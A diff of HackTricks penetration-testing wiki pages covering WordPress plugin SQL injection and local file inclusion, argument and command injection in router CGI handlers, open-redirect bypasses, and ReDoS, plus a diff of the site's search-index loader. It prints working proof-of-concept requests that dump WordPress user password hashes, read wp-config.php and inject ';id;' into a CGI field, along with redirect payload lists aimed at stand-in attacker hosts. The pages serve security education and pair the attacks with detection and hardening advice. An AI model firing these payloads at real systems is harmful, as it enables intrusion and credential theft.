 | ||||
| ```bash | ||||
| # Replace action with the affected depicter-* handler on the target | ||||
| curl -G "https://victim.tld/wp-admin/admin-ajax.php" \ | ||||
|   --data-urlencode 'action=depicter_search' \ | ||||
|   --data-urlencode "s=' UNION SELECT user_login,user_pass FROM wp_users-- -" | ||||
| ``` | ||||
| 
 | ||||
| Detection checklist | ||||
| - Grep for depicter-* action handlers and direct use of $_GET['s'] or $_POST['s'] in SQL | ||||
| - Review custom queries passed to $wpdb->get_results()/query() concatenating s | ||||
| 
 | ||||
| Hardening | ||||
| - Always use $wpdb->prepare() or wpdb placeholders; reject unexpected metacharacters server-side | ||||
| - Add a strict allowlist for s and normalize to expected charset/length | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ## Unauthenticated Local File Inclusion via unvalidated template/file path (Kubio AI Page Builder ≤ 2.5.1) | ||||
| 
 | ||||
| Accepting attacker-controlled paths in a template parameter without normalization/containment allows reading arbitrary local files, and sometimes code execution if includable PHP/log files are pulled into runtime. | ||||
| 
 | ||||
| - Parameter: __kubio-site-edit-iframe-classic-template | ||||
| - Flaw: no normalization/allowlisting; traversal permitted | ||||
| - Impact: secret disclosure (wp-config.php), potential RCE in specific environments (log poisoning, includable PHP) | ||||
| 
 | ||||
| PoC – read wp-config.php | ||||
| 
 | ||||
| ```bash | ||||
| curl -i "https://victim.tld/?__kubio-site-edit-iframe-classic-template=../../../../wp-config.php" | ||||
| ``` | ||||
| 
 | ||||
| Detection checklist | ||||
| - Any handler concatenating request paths into include()/require()/read sinks without realpath() containment | ||||
| - Look for traversal patterns (../) reaching outside the intended templates directory | ||||
| 
 | ||||
| Hardening | ||||
| - Enforce allowlisted templates; resolve with realpath() and require str_starts_with(realpath(file), realpath(allowed_base)) | ||||
| - Normalize input; reject traversal sequences and absolute paths; use sanitize_file_name() only for filenames (not full paths) | ||||
| 
 | ||||
| 
 | ||||
| ## References | ||||
| 
 | ||||
| - [Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/) | ||||
| @ -863,7 +925,11 @@ Patched behaviour (Jobmonster 4.8.0) | ||||
| - [Hackers exploiting critical WordPress WooCommerce Payments bug](https://www.bleepingcomputer.com/news/security/hackers-exploiting-critical-wordpress-woocommerce-payments-bug/) | ||||
| - [Unpatched Privilege Escalation in Service Finder Bookings Plugin](https://patchstack.com/articles/unpatched-privilege-escalation-in-service-finder-bookings-plugin/) | ||||
| - [Service Finder Bookings privilege escalation – Patchstack DB entry](https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-booking-6-0-privilege-escalation-vulnerability) | ||||
| 
 | ||||
| - [Unauthenticated Broken Authentication Vulnerability in WordPress Jobmonster Theme](https://patchstack.com/articles/unauthenticated-broken-authentication-vulnerability-in-wordpress-jobmonster-theme/) | ||||
| - [Q3 2025’s most exploited WordPress vulnerabilities and how RapidMitigate blocked them](https://patchstack.com/articles/q3-2025s-most-exploited-wordpress-vulnerabilities-and-how-patchstacks-rapidmitigate-blocked-them/) | ||||
| - [OttoKit (SureTriggers) ≤ 1.0.82 – Privilege Escalation (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/suretriggers/vulnerability/wordpress-suretriggers-1-0-82-privilege-escalation-vulnerability) | ||||
| - [FunnelKit Automations ≤ 3.5.3 – Unauthenticated arbitrary plugin installation (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/wp-marketing-automations/vulnerability/wordpress-recover-woocommerce-cart-abandonment-newsletter-email-marketing-marketing-automation-by-funnelkit-plugin-3-5-3-missing-authorization-to-unauthenticated-arbitrary-plugin-installation-vulnerability) | ||||
| - [Depicter Slider ≤ 3.6.1 – Unauthenticated SQLi via s parameter (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/depicter/vulnerability/wordpress-depicter-slider-plugin-3-6-1-unauthenticated-sql-injection-via-s-parameter-vulnerability) | ||||
| - [Kubio AI Page Builder ≤ 2.5.1 – Unauthenticated LFI (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/kubio/vulnerability/wordpress-kubio-ai-page-builder-plugin-2-5-1-unauthenticated-local-file-inclusion-vulnerability) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
|  | ||||
| @ -158,6 +158,37 @@ execFile('/usr/bin/do-something', [ | ||||
| 
 | ||||
| Real-world case: *Synology Photos* ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker controlled data into `id_user` which was later embedded in an `exec()` call, achieving RCE (Pwn2Own Ireland 2024). | ||||
| 
 | ||||
| ### Argument/Option injection via leading hyphen (argv, no shell metacharacters) | ||||
| 
 | ||||
| Not all injections require shell metacharacters. If the application passes untrusted strings as arguments to a system utility (even with `execve`/`execFile` and no shell), many programs will still parse any argument that begins with `-` or `--` as an option. This lets an attacker flip modes, change output paths, or trigger dangerous behaviors without ever breaking into a shell. | ||||
| 
 | ||||
| Typical places where this appears: | ||||
| 
 | ||||
| - Embedded web UIs/CGI handlers that build commands like `ping <user>`, `tcpdump -i <iface> -w <file>`, `curl <url>`, etc. | ||||
| - Centralized CGI routers (e.g., `/cgi-bin/<something>.cgi` with a selector parameter like `topicurl=<handler>`) where multiple handlers reuse the same weak validator. | ||||
| 
 | ||||
| What to try: | ||||
| 
 | ||||
| - Provide values that start with `-`/`--` to be consumed as flags by the downstream tool. | ||||
| - Abuse flags that change behavior or write files, for example: | ||||
|   - `ping`: `-f`/`-c 100000` to stress the device (DoS) | ||||
|   - `curl`: `-o /tmp/x` to write arbitrary paths, `-K <url>` to load attacker-controlled config | ||||
|   - `tcpdump`: `-G 1 -W 1 -z /path/script.sh` to achieve post-rotate execution in unsafe wrappers | ||||
| - If the program supports `--` end-of-options, try to bypass naive mitigations that prepend `--` in the wrong place. | ||||
| 
 | ||||
| Generic PoC shapes against centralized CGI dispatchers: | ||||
| 
 | ||||
| ``` | ||||
| POST /cgi-bin/cstecgi.cgi HTTP/1.1 | ||||
| Content-Type: application/x-www-form-urlencoded | ||||
| 
 | ||||
| # Flip options in a downstream tool via argv injection | ||||
| topicurl=<handler>¶m=-n | ||||
| 
 | ||||
| # Unauthenticated RCE when a handler concatenates into a shell | ||||
| topicurl=setEasyMeshAgentCfg&agentName=;id; | ||||
| ``` | ||||
| 
 | ||||
| ## Brute-Force Detection List | ||||
| 
 | ||||
| 
 | ||||
| @ -173,5 +204,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject | ||||
| - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html) | ||||
| - [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php) | ||||
| - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) | ||||
| - [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/) | ||||
| 
 | ||||
| {{#include ../banners/hacktricks-training.md}} | ||||
|  | ||||
| @ -7,12 +7,23 @@ | ||||
| 
 | ||||
| ### Redirect to localhost or arbitrary domains | ||||
| 
 | ||||
| - If the app “allows only internal/whitelisted hosts”, try alternative host notations to hit loopback or internal ranges via the redirect target: | ||||
|   - IPv4 loopback variants: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal) | ||||
|   - IPv6 loopback variants: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1] | ||||
|   - Trailing dot and casing: localhost., LOCALHOST, 127.0.0.1. | ||||
|   - Wildcard DNS that resolves to loopback: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me. These are useful when only “subdomains of X” are allowed but host resolution still points to 127.0.0.1. | ||||
| - Network-path references often bypass naive validators that prepend a scheme or only check prefixes: | ||||
|   - //attacker.tld → interpreted as scheme-relative and navigates off-site with the current scheme. | ||||
| - Userinfo tricks defeat contains/startswith checks against trusted hosts: | ||||
|   - https://trusted.tld@attacker.tld/ → browser navigates to attacker.tld but simple string checks “see” trusted.tld. | ||||
| - Backslash parsing confusion between frameworks/browsers: | ||||
|   - https://trusted.tld\@attacker.tld → some backends treat “\” as a path char and pass validation; browsers normalize to “/” and interpret trusted.tld as userinfo, sending users to attacker.tld. This also appears in Node/PHP URL-parser mismatches. | ||||
| 
 | ||||
| {{#ref}} | ||||
| ssrf-server-side-request-forgery/url-format-bypass.md | ||||
| {{#endref}} | ||||
| 
 | ||||
| ### Open Redirect to XSS | ||||
| ### Modern open-redirect to XSS pivots | ||||
| 
 | ||||
| ```bash | ||||
| #Basic payload, javascript code is executed after "javascript:" | ||||
| @ -60,6 +71,34 @@ javascript://whitelisted.com?%a0alert%281%29 | ||||
| ";alert(0);// | ||||
| ``` | ||||
| 
 | ||||
| <details> | ||||
| <summary>More modern URL-based bypass payloads</summary> | ||||
| 
 | ||||
| ```text | ||||
| # Scheme-relative (current scheme is reused) | ||||
| //evil.example | ||||
| 
 | ||||
| # Credentials (userinfo) trick | ||||
| https://trusted.example@evil.example/ | ||||
| 
 | ||||
| # Backslash confusion (server validates, browser normalizes) | ||||
| https://trusted.example\@evil.example/ | ||||
| 
 | ||||
| # Schemeless with whitespace/control chars | ||||
| evil.example%00 | ||||
| %09//evil.example | ||||
| 
 | ||||
| # Prefix/suffix matching flaws | ||||
| https://trusted.example.evil.example/ | ||||
| https://evil.example/trusted.example | ||||
| 
 | ||||
| # When only path is accepted, try breaking absolute URL detection | ||||
| /\\evil.example | ||||
| /..//evil.example | ||||
| ``` | ||||
| ``` | ||||
| </details> | ||||
| 
 | ||||
| ## Open Redirect uploading svg files | ||||
| 
 | ||||
| ```html | ||||
| @ -173,18 +212,78 @@ exit; | ||||
| ?> | ||||
| ``` | ||||
| 
 | ||||
| ## Hunting and exploitation workflow (practical) | ||||
| 
 | ||||
| - Single URL check with curl: | ||||
| 
 | ||||
| ```bash | ||||
| curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:" | ||||
| ``` | ||||
| 
 | ||||
| - Discover and fuzz likely parameters at scale: | ||||
| 
 | ||||
| <details> | ||||
| <summary>Click to expand</summary> | ||||
| 
 | ||||
| ```bash | ||||
| # 1) Gather historical URLs, keep those with common redirect params | ||||
| cat domains.txt \ | ||||
|   | gau --o urls.txt            # or: waybackurls / katana / hakrawler | ||||
| 
 | ||||
| # 2) Grep common parameters and normalize list | ||||
| rg -NI "(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)" urls.txt \ | ||||
|   | sed 's/\r$//' | sort -u > candidates.txt | ||||
| 
 | ||||
| # 3) Use OpenRedireX to fuzz with payload corpus | ||||
| cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt | ||||
| 
 | ||||
| # 4) Manually verify interesting hits | ||||
| awk '/30[1237]|Location:/I' results.txt | ||||
| ``` | ||||
| ``` | ||||
| </details> | ||||
| 
 | ||||
| - Don’t forget client-side sinks in SPAs: look for window.location/assign/replace and framework helpers that read query/hash and redirect. | ||||
| 
 | ||||
| - Frameworks often introduce footguns when redirect destinations are derived from untrusted input (query params, Referer, cookies). See Next.js notes about redirects and avoid dynamic destinations derived from user input. | ||||
| 
 | ||||
| {{#ref}} | ||||
| ../network-services-pentesting/pentesting-web/nextjs.md | ||||
| {{#endref}} | ||||
| 
 | ||||
| - OAuth/OIDC flows: abusing open redirectors frequently escalates to account takeover by leaking authorization codes/tokens. See dedicated guide: | ||||
| 
 | ||||
| {{#ref}} | ||||
| ./oauth-to-account-takeover.md | ||||
| {{#endref}} | ||||
| 
 | ||||
| - Server responses that implement redirects without Location (meta refresh/JavaScript) are still exploitable for phishing and can sometimes be chained. Grep for: | ||||
| 
 | ||||
| ```html | ||||
| <meta http-equiv="refresh" content="0;url=//evil.example"> | ||||
| <script>location = new URLSearchParams(location.search).get('next')</script> | ||||
| ``` | ||||
| 
 | ||||
| ## Tools | ||||
| 
 | ||||
| - [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer) | ||||
| - OpenRedireX – fuzzer for detecting open redirects. Example: | ||||
| 
 | ||||
| ## Resources | ||||
| ```bash | ||||
| # Install | ||||
| git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh | ||||
| 
 | ||||
| - In [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) you can find fuzzing lists. | ||||
| # Fuzz a list of candidate URLs (use FUZZ as placeholder) | ||||
| cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50 | ||||
| ``` | ||||
| 
 | ||||
| ## References | ||||
| 
 | ||||
| - In https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect you can find fuzzing lists. | ||||
| - [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html) | ||||
| - [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads) | ||||
| - [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a) | ||||
| 
 | ||||
| - PortSwigger Web Security Academy – DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection | ||||
| - OpenRedireX – A fuzzer for detecting open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX | ||||
| 
 | ||||
| {{#include ../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| 
 | ||||
|  | ||||
| @ -8,7 +8,12 @@ A **Regular Expression Denial of Service (ReDoS)** happens when someone takes ad | ||||
| 
 | ||||
| ## The Problematic Regex Naïve Algorithm | ||||
| 
 | ||||
| **Check the details in [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)** | ||||
| **Check the details in [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)** | ||||
| 
 | ||||
| ### Engine behavior and exploitability | ||||
| 
 | ||||
| - Most popular engines (PCRE, Java `java.util.regex`, Python `re`, JavaScript `RegExp`) use a **backtracking** VM. Crafted inputs that create many overlapping ways to match a subpattern force exponential or high-polynomial backtracking. | ||||
| - Some engines/libraries are designed to be **ReDoS-resilient** by construction (no backtracking), e.g. **RE2** and ports based on finite automata that provide worst‑case linear time; using them for untrusted input removes the backtracking DoS primitive. See the references at the end for details. | ||||
| 
 | ||||
| ## Evil Regexes <a href="#evil-regexes" id="evil-regexes"></a> | ||||
| 
 | ||||
| @ -18,10 +23,36 @@ An evil regular expression pattern is that one that can **get stuck on crafted i | ||||
| - ([a-zA-Z]+)\* | ||||
| - (a|aa)+ | ||||
| - (a|a?)+ | ||||
| - (.\*a){x} for x > 10 | ||||
| - (.*a){x} for x > 10 | ||||
| 
 | ||||
| All those are vulnerable to the input `aaaaaaaaaaaaaaaaaaaaaaaa!`. | ||||
| 
 | ||||
| ### Practical recipe to build PoCs | ||||
| 
 | ||||
| Most catastrophic cases follow this shape: | ||||
| 
 | ||||
| - Prefix that gets you into the vulnerable subpattern (optional). | ||||
| - Long run of a character that causes ambiguous matches inside nested/overlapping quantifiers (e.g., many `a`, `_`, or spaces). | ||||
| - A final character that forces overall failure so the engine must backtrack through all possibilities (often a character that won’t match the last token, like `!`). | ||||
| 
 | ||||
| Minimal examples: | ||||
| 
 | ||||
| - `(a+)+$` vs input `"a"*N + "!"` | ||||
| - `\w*_*\w*$` vs input `"v" + "_"*N + "!"` | ||||
| 
 | ||||
| Increase N and observe super‑linear growth. | ||||
| 
 | ||||
| #### Quick timing harness (Python) | ||||
| 
 | ||||
| ```python | ||||
| import re, time | ||||
| pat = re.compile(r'(\w*_)\w*$') | ||||
| for n in [2**k for k in range(8, 15)]: | ||||
|     s = 'v' + '_'*n + '!' | ||||
|     t0=time.time(); pat.search(s); dt=time.time()-t0 | ||||
|     print(n, f"{dt:.3f}s") | ||||
| ``` | ||||
| 
 | ||||
| ## ReDoS Payloads | ||||
| 
 | ||||
| ### String Exfiltration via ReDoS | ||||
| @ -30,7 +61,7 @@ In a CTF (or bug bounty) maybe you **control the Regex a sensitive information ( | ||||
| 
 | ||||
| - In [**this post**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) you can find this ReDoS rule: `^(?=<flag>)((.*)*)*salt$` | ||||
|   - Example: `^(?=HTB{sOmE_fl§N§)((.*)*)*salt$` | ||||
| - In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) you can find this one:`<flag>(((((((.*)*)*)*)*)*)*)!` | ||||
| - In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html) you can find this one:`<flag>(((((((.*)*)*)*)*)*)*)!` | ||||
| - In [**this writeup**](https://ctftime.org/writeup/25869) he used: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$` | ||||
| 
 | ||||
| ### ReDoS Controlling Input and Regex | ||||
| @ -67,19 +98,35 @@ Regexp (a+)*$ took 723 milliseconds. | ||||
| */ | ||||
| ``` | ||||
| 
 | ||||
| ### Language/engine notes for attackers | ||||
| 
 | ||||
| - JavaScript (browser/Node): Built‑in `RegExp` is a backtracking engine and commonly exploitable when regex+input are attacker‑influenced. | ||||
| - Python: `re` is backtracking. Long ambiguous runs plus a failing tail often yield catastrophic backtracking. | ||||
| - Java: `java.util.regex` is backtracking. If you only control input, look for endpoints using complex validators; if you control patterns (e.g., stored rules), ReDoS is usually trivial. | ||||
| - Engines such as **RE2/RE2J/RE2JS** or the **Rust regex** crate are designed to avoid catastrophic backtracking. If you hit these, focus on other bottlenecks (e.g., enormous patterns) or find components still using backtracking engines. | ||||
| 
 | ||||
| ## Tools | ||||
| 
 | ||||
| - [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit) | ||||
|   - Find vulnerable regexes and auto‑generate evil inputs. Examples: | ||||
|     - `pip install regexploit` | ||||
|     - Analyze one pattern interactively: `regexploit` | ||||
|     - Scan Python/JS code for regexes: `regexploit-py path/` and `regexploit-js path/` | ||||
| - [https://devina.io/redos-checker](https://devina.io/redos-checker) | ||||
| - [https://github.com/davisjam/vuln-regex-detector](https://github.com/davisjam/vuln-regex-detector) | ||||
|   - End‑to‑end pipeline to extract regexes from a project, detect vulnerable ones, and validate PoCs in the target language. Useful for hunting through large codebases. | ||||
| - [https://github.com/tjenkinson/redos-detector](https://github.com/tjenkinson/redos-detector) | ||||
|   - Simple CLI/JS library that reasons about backtracking to report if a pattern is safe. | ||||
| 
 | ||||
| > Tip: When you only control input, generate strings with doubling lengths (e.g., 2^k characters) and track latency. Exponential growth strongly indicates a viable ReDoS. | ||||
| 
 | ||||
| ## References | ||||
| 
 | ||||
| - [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) | ||||
| - [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) | ||||
| - [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) | ||||
| - [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) | ||||
| - [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html) | ||||
| - [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869) | ||||
| - SoK (2024): A Literature and Engineering Review of Regular Expression Denial of Service (ReDoS) — [https://arxiv.org/abs/2406.11618](https://arxiv.org/abs/2406.11618) | ||||
| - Why RE2 (linear‑time regex engine) — [https://github.com/google/re2/wiki/WhyRE2](https://github.com/google/re2/wiki/WhyRE2) | ||||
| 
 | ||||
| {{#include ../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| 
 | ||||
| 
 | ||||
|  | ||||
| @ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con | ||||
| 
 | ||||
| > [!TIP] | ||||
| > | ||||
| > - **How can I  a page of HackTricks?** | ||||
| > - **How can I reference a page of HackTricks?** | ||||
| 
 | ||||
| As long as the link **of** the page(s) where you took the information from appears it's enough.\ | ||||
| If you need a bibtex you can use something like: | ||||
|  | ||||
| @ -6,34 +6,63 @@ | ||||
| */ | ||||
| 
 | ||||
| (() => { | ||||
|   "use strict"; | ||||
|     "use strict"; | ||||
|    | ||||
|     /* ───────────── 0. helpers (main thread) ───────────── */ | ||||
|     const clear = el => { while (el.firstChild) el.removeChild(el.firstChild); }; | ||||
|    | ||||
|     /* ───────────── 1. Web‑Worker code ─────────────────── */ | ||||
|     const workerCode = ` | ||||
|       self.window = self; | ||||
|       self.search = self.search || {}; | ||||
|       const abs = p => location.origin + p; | ||||
|    | ||||
|       /* 1 — elasticlunr */ | ||||
|       try { importScripts('https://cdn.jsdelivr.net/npm/elasticlunr@0.9.5/elasticlunr.min.js'); } | ||||
|       catch { importScripts(abs('/elasticlunr.min.js')); } | ||||
|    | ||||
|     /* 2 — decompress gzip data */ | ||||
|     async function decompressGzip(arrayBuffer){ | ||||
|       if(typeof DecompressionStream !== 'undefined'){ | ||||
|         /* Modern browsers: use native DecompressionStream */ | ||||
|         const stream = new Response(arrayBuffer).body.pipeThrough(new DecompressionStream('gzip')); | ||||
|         const decompressed = await new Response(stream).arrayBuffer(); | ||||
|         return new TextDecoder().decode(decompressed); | ||||
|       } else { | ||||
|         /* Fallback: use pako library */ | ||||
|         if(typeof pako === 'undefined'){ | ||||
|           try { importScripts('https://cdn.jsdelivr.net/npm/pako@2.1.0/dist/pako.min.js'); } | ||||
|           catch(e){ throw new Error('pako library required for decompression: '+e); } | ||||
|         } | ||||
|         const uint8Array = new Uint8Array(arrayBuffer); | ||||
|         const decompressed = pako.ungzip(uint8Array, {to: 'string'}); | ||||
|         return decompressed; | ||||
|       } | ||||
|     } | ||||
| 
 | ||||
|   /* ───────────── 0. helpers (main thread) ───────────── */ | ||||
|   const clear = el => { while (el.firstChild) el.removeChild(el.firstChild); }; | ||||
| 
 | ||||
|   /* ───────────── 1. Web‑Worker code ─────────────────── */ | ||||
|   const workerCode = ` | ||||
|     self.window = self; | ||||
|     self.search = self.search || {}; | ||||
|     const abs = p => location.origin + p; | ||||
| 
 | ||||
|     /* 1 — elasticlunr */ | ||||
|     try { importScripts('https://cdn.jsdelivr.net/npm/elasticlunr@0.9.5/elasticlunr.min.js'); } | ||||
|     catch { importScripts(abs('/elasticlunr.min.js')); } | ||||
| 
 | ||||
|     /* 2 — load a single index (remote → local) */ | ||||
|     /* 3 — load a single index (remote → local) */ | ||||
|     async function loadIndex(remote, local, isCloud=false){ | ||||
|       let rawLoaded = false; | ||||
|       if(remote){ | ||||
|         /* Try ONLY compressed version from GitHub (remote already includes .js.gz) */ | ||||
|         try { | ||||
|           const r = await fetch(remote,{mode:'cors'}); | ||||
|           if (!r.ok) throw new Error('HTTP '+r.status); | ||||
|           importScripts(URL.createObjectURL(new Blob([await r.text()],{type:'application/javascript'}))); | ||||
|           rawLoaded = true; | ||||
|         } catch(e){ console.warn('remote',remote,'failed →',e); } | ||||
|           if (r.ok) { | ||||
|             const compressed = await r.arrayBuffer(); | ||||
|             const text = await decompressGzip(compressed); | ||||
|             importScripts(URL.createObjectURL(new Blob([text],{type:'application/javascript'}))); | ||||
|             rawLoaded = true; | ||||
|             console.log('Loaded compressed from GitHub:',remote); | ||||
|           } | ||||
|         } catch(e){ console.warn('compressed GitHub',remote,'failed →',e); } | ||||
|       } | ||||
|       /* If remote (GitHub) failed, fall back to local uncompressed file */ | ||||
|       if(!rawLoaded && local){ | ||||
|         try { importScripts(abs(local)); rawLoaded = true; } | ||||
|         try {  | ||||
|           importScripts(abs(local));  | ||||
|           rawLoaded = true; | ||||
|           console.log('Loaded local fallback:',local); | ||||
|         } | ||||
|         catch(e){ console.error('local',local,'failed →',e); } | ||||
|       } | ||||
|       if(!rawLoaded) return null;                 /* give up on this index */ | ||||
| @ -61,151 +90,159 @@ | ||||
| 
 | ||||
|       return local ? loadIndex(null, local, isCloud) : null; | ||||
|     } | ||||
|      | ||||
|     let built = []; | ||||
|     const MAX = 30, opts = {bool:'AND', expand:true}; | ||||
|      | ||||
|     self.onmessage = async ({data}) => { | ||||
|       if(data.type === 'init'){ | ||||
|         const lang = data.lang || 'en'; | ||||
|         const searchindexBase = 'https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-searchindex/master'; | ||||
| 
 | ||||
|     (async () => { | ||||
|       const htmlLang = (document.documentElement.lang || 'en').toLowerCase(); | ||||
|       const lang = htmlLang.split('-')[0]; | ||||
|       const mainReleaseBase = 'https://github.com/HackTricks-wiki/hacktricks/releases/download'; | ||||
|       const cloudReleaseBase = 'https://github.com/HackTricks-wiki/hacktricks-cloud/releases/download'; | ||||
|         /* Remote sources are .js.gz (compressed), local fallback is .js (uncompressed) */ | ||||
|         const mainFilenames = Array.from(new Set(['searchindex-' + lang + '.js.gz', 'searchindex-en.js.gz'])); | ||||
|         const cloudFilenames = Array.from(new Set(['searchindex-cloud-' + lang + '.js.gz', 'searchindex-cloud-en.js.gz'])); | ||||
| 
 | ||||
|       const mainTags = Array.from(new Set([\`searchindex-\${lang}\`, 'searchindex-en', 'searchindex-master']));
 | ||||
|       const cloudTags = Array.from(new Set([\`searchindex-\${lang}\`, 'searchindex-en', 'searchindex-master']));
 | ||||
|         const MAIN_REMOTE_SOURCES  = mainFilenames.map(function(filename) { return searchindexBase + '/' + filename; }); | ||||
|         const CLOUD_REMOTE_SOURCES = cloudFilenames.map(function(filename) { return searchindexBase + '/' + filename; }); | ||||
| 
 | ||||
|       const MAIN_REMOTE_SOURCES  = mainTags.map(tag => \`\${mainReleaseBase}/\${tag}/searchindex.js\`);
 | ||||
|       const CLOUD_REMOTE_SOURCES = cloudTags.map(tag => \`\${cloudReleaseBase}/\${tag}/searchindex.js\`);
 | ||||
| 
 | ||||
|       const indices = []; | ||||
|       const main = await loadWithFallback(MAIN_REMOTE_SOURCES , '/searchindex.js',        false); if(main)  indices.push(main); | ||||
|       const cloud= await loadWithFallback(CLOUD_REMOTE_SOURCES, '/searchindex-cloud.js',  true ); if(cloud) indices.push(cloud); | ||||
| 
 | ||||
|       if(!indices.length){ postMessage({ready:false, error:'no-index'}); return; } | ||||
| 
 | ||||
|       /* build index objects */ | ||||
|       const built = indices.map(d => ({ | ||||
|         idx : elasticlunr.Index.load(d.json), | ||||
|         urls: d.urls, | ||||
|         cloud: d.cloud, | ||||
|         base: d.cloud ? 'https://cloud.hacktricks.wiki/' : '' | ||||
|       })); | ||||
| 
 | ||||
|       postMessage({ready:true}); | ||||
|       const MAX = 30, opts = {bool:'AND', expand:true}; | ||||
| 
 | ||||
|       self.onmessage = ({data:q}) => { | ||||
|         if(!q){ postMessage([]); return; } | ||||
| 
 | ||||
|         const all = []; | ||||
|         for(const s of built){ | ||||
|           const res = s.idx.search(q,opts); | ||||
|           if(!res.length) continue; | ||||
|           const max = res[0].score || 1; | ||||
|           res.forEach(r => { | ||||
|             const doc = s.idx.documentStore.getDoc(r.ref); | ||||
|             all.push({ | ||||
|               norm : r.score / max, | ||||
|               title: doc.title, | ||||
|               body : doc.body, | ||||
|               breadcrumbs: doc.breadcrumbs, | ||||
|               url  : s.base + s.urls[r.ref], | ||||
|               cloud: s.cloud | ||||
|         const indices = []; | ||||
|         const main = await loadWithFallback(MAIN_REMOTE_SOURCES , '/searchindex-book.js',        false); if(main)  indices.push(main); | ||||
|         const cloud= await loadWithFallback(CLOUD_REMOTE_SOURCES, '/searchindex.js',  true ); if(cloud) indices.push(cloud);   | ||||
|         if(!indices.length){ postMessage({ready:false, error:'no-index'}); return; } | ||||
|    | ||||
|         /* build index objects */ | ||||
|         built = indices.map(d => ({ | ||||
|           idx : elasticlunr.Index.load(d.json), | ||||
|           urls: d.urls, | ||||
|           cloud: d.cloud, | ||||
|           base: d.cloud ? 'https://cloud.hacktricks.wiki/' : '' | ||||
|         })); | ||||
|    | ||||
|         postMessage({ready:true}); | ||||
|         return; | ||||
|       } | ||||
|        | ||||
|       const q = data.query || data; | ||||
|       if(!q){ postMessage([]); return; } | ||||
|    | ||||
|           const all = []; | ||||
|           for(const s of built){ | ||||
|             const res = s.idx.search(q,opts); | ||||
|             if(!res.length) continue; | ||||
|             const max = res[0].score || 1; | ||||
|             res.forEach(r => { | ||||
|               const doc = s.idx.documentStore.getDoc(r.ref); | ||||
|               all.push({ | ||||
|                 norm : r.score / max, | ||||
|                 title: doc.title, | ||||
